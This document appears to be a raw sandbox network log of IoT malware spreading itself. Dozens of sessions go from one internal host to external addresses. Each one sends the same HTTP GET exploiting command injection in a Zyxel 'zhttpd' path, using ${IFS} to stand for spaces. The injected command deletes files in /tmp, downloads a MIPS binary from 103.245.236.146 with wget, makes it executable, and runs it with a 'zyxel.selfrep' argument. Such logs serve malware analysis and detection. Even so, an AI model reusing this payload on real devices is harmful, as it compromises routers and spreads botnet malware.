                                                Jan 28, 2024 10:16:34.956816912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6890192.168.2.2334862131.171.142.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956825018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6891192.168.2.2334162212.183.10.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956860065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6892192.168.2.234623484.92.12.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956902027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6893192.168.2.2342040181.211.110.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956927061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6894192.168.2.2351926221.119.44.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956955910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6895192.168.2.2360396195.234.242.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.956990957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6896192.168.2.235760078.10.12.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957009077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6897192.168.2.2360174148.59.100.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957043886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6898192.168.2.2360694112.194.10.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957066059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6899192.168.2.2344162220.121.13.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957098007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6900192.168.2.2340756141.191.113.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957132101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6901192.168.2.233424238.116.242.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957144976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6902192.168.2.235391093.98.25.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957195997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6903192.168.2.235765899.177.241.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957225084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6904192.168.2.2342800148.222.247.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957242012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6905192.168.2.233858872.102.31.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957279921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6906192.168.2.234289613.148.227.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957333088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6907192.168.2.23362905.12.78.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957356930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6908192.168.2.2355738115.101.74.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957415104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6909192.168.2.235426274.235.125.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957448959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6910192.168.2.2350994191.41.113.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957469940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6911192.168.2.2359482122.0.16.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957489967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6912192.168.2.2353078128.120.111.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957514048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6913192.168.2.2332980154.59.192.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957532883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6914192.168.2.2339310137.124.42.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957532883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6915192.168.2.2355204200.118.183.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957590103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6916192.168.2.2352128130.64.33.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957629919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6917192.168.2.233443491.34.61.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957650900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6918192.168.2.23486129.141.135.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957658052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6919192.168.2.2357410193.127.151.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957680941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6920192.168.2.234470883.39.176.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957680941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6921192.168.2.235523248.100.231.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957712889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6922192.168.2.234309094.94.107.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957740068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6923192.168.2.2342568196.106.187.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957815886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6924192.168.2.2348354148.122.65.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957863092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6925192.168.2.233703845.65.2.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957882881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6926192.168.2.2351040217.203.189.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957907915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6927192.168.2.2352650184.93.125.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957942963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6928192.168.2.234739652.173.116.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.957972050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6929192.168.2.2338910200.226.202.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958007097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6930192.168.2.233829243.64.106.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958038092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6931192.168.2.2348604191.146.206.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958043098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6932192.168.2.233405245.28.9.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958076000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6933192.168.2.2343264126.70.4.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958087921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6934192.168.2.2335862174.68.253.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958110094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6935192.168.2.2358638197.58.119.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958153963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6936192.168.2.2334548156.132.231.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958168983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6937192.168.2.2360320183.108.187.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958203077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6938192.168.2.2342348136.29.130.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958209991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6939192.168.2.235281880.186.77.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958228111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6940192.168.2.233420886.85.4.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958255053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6941192.168.2.235473461.127.29.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958304882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6942192.168.2.2359630120.124.226.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958329916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6943192.168.2.233851262.250.243.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958349943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6944192.168.2.2352324201.252.234.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958375931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6945192.168.2.2357298192.25.27.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958405018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6946192.168.2.2339714160.247.199.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958432913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6947192.168.2.2337378147.74.173.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958465099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6948192.168.2.2350308105.171.90.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958499908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6949192.168.2.233716224.119.3.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958534956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6950192.168.2.2358164108.213.86.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:34.958551884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6951192.168.2.235807469.92.239.57443
                                                TimestampBytes transferredDirectionData
